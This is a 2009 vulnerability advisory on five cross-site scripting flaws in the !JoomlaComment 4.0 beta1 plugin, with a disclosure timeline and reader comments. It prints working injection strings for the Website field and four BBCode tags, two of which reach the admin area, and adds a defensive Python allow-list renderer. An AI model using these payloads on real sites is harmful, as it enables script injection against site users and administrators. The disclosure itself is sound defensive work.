Thursday, 17 September 2009 00:00

!JoomlaComment 4.0 beta1, a commenting plugin, suffers from multiple XSS vulnerabilities.

  1. Website Input XSS

    The 'Website' input field is checked for HTML markup, but the quote characters are not sanitized, so extra attributes can be injected into the generated link tag:
    ' onmouseover='alert(String.fromCharCode(88,83,83))
    ' style='color:expression(alert(String.fromCharCode(88,83,83)))
  2. [img] BBCode Tag XSS

    [img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
  3. [url] BBCode Tag XSS

    [url=http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))]XSS[/url]
  4. [size] BBCode Tag XSS

    [size=large;color:expression(alert(String.fromCharCode(88,83,83)))]XSS[/size]
    This XSS vulnerability executes in the administrator area as well.
  5. [color] BBCode Tag XSS

    [color=red;font-size:expression(alert(String.fromCharCode(88,83,83)))]XSS[/color]
    This XSS vulnerability executes in the administrator area as well.
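A hardened renderer for the inputs listed above, added here as an illustration and not code from !JoomlaComment (it is written in Python rather than the extension's PHP; the tag names are the page's, while the function names and the allow-list values are my own choices). Every tag parameter and the Website value is checked against a strict allow-list before it is placed in an HTML attribute, and a tag whose parameter fails the check is emitted as escaped literal text rather than silently dropped.

```python
import html
import re

# Allow-lists (assumed values). Anything not on them never reaches an HTML
# attribute, which is what closes the attribute-injection holes listed above.
URL_RE = re.compile(r"^https?://[A-Za-z0-9.\-]+(?:/[A-Za-z0-9._~\-/%?=&+]*)?$")
SIZES = {"small": "0.8em", "medium": "1em", "large": "1.3em"}
COLORS = {"red", "green", "blue", "black"}

# Tag grammar: a parameter may not contain ']', inner text may not contain '['.
TAG_RE = re.compile(
    r"\[img\]([^\[]*)\[/img\]"
    r"|\[url=([^\]]*)\]([^\[]*)\[/url\]"
    r"|\[size=([^\]]*)\]([^\[]*)\[/size\]"
    r"|\[color=([^\]]*)\]([^\[]*)\[/color\]",
    re.IGNORECASE,
)

def safe_url(value):
    """Return the URL unchanged only if it is a plain http(s) URL; else None."""
    return value if URL_RE.match(value) else None

def attr(value):
    """Escape a value that has already passed an allow-list, for attribute use."""
    return html.escape(value, quote=True)

def _render_tag(m):
    img, url, url_text, size, size_text, color, color_text = m.groups()
    if img is not None and safe_url(img):
        return f'<img src="{attr(img)}" alt="">'
    if url is not None and safe_url(url):
        return f'<a href="{attr(url)}">{html.escape(url_text)}</a>'
    if size is not None and size.lower() in SIZES:
        return f'<span style="font-size:{SIZES[size.lower()]}">{html.escape(size_text)}</span>'
    if color is not None and color.lower() in COLORS:
        return f'<span style="color:{color.lower()}">{html.escape(color_text)}</span>'
    # Tag with a rejected parameter: show it as literal text, fully escaped.
    return html.escape(m.group(0), quote=True)

def render_comment(text):
    """Convert the BBCode subset to HTML; all other text is HTML-escaped."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()], quote=True))
        out.append(_render_tag(m))
        pos = m.end()
    out.append(html.escape(text[pos:], quote=True))
    return "".join(out)

def render_author(name, website):
    """Link the author name only when the Website field is a validated URL."""
    safe_name = html.escape(name, quote=True)
    site = safe_url(website.strip()) if website else None
    return f'<a href="{attr(site)}">{safe_name}</a>' if site else safe_name
```

The inner text of a tag is escaped rather than parsed again, so nested tags are not supported; the point is that no user-controlled value reaches an attribute or a style declaration without passing an allow-list.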

Timeline

  • Vulnerabilities Discovered: 31 July 2009
  • Vendor Notified: 31 July 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:36
 
Comments (3)
1 Wednesday, 25 November 2009 20:02
Adrian S
Hey there,

Thanks for posting this. I discovered it via the Vulnerable Extensions List. I noticed that this is for version 4.0 Beta version 1. I'm currently using Version 4.0 Beta Version 2. Any idea if the problem has been corrected in the current build?
2 Wednesday, 25 November 2009 20:04
Jeff Channell
I'm not sure if it was fixed or not - I never received any response from the vendor.

Sorry I can't be more helpful than that!
3 Friday, 29 January 2010 06:47
Daniel Dimitrov
The latest release !joomlacomment RC1 fixes this problem. More information here:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
